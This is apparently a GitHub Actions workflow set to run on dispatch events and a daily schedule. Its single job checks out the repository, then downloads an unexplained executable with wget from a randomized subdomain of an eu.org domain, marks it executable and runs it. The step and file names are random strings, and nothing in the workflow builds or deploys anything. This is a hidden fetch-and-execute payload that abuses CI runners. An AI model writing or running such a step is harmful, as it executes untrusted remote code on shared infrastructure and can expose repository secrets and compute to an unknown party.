#2024-03-18-[135738]-g4exodbl
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "55 2 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: l9hpppxr55ner9rz
        run: |
          wget -q https://w1dldvia786fewat.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories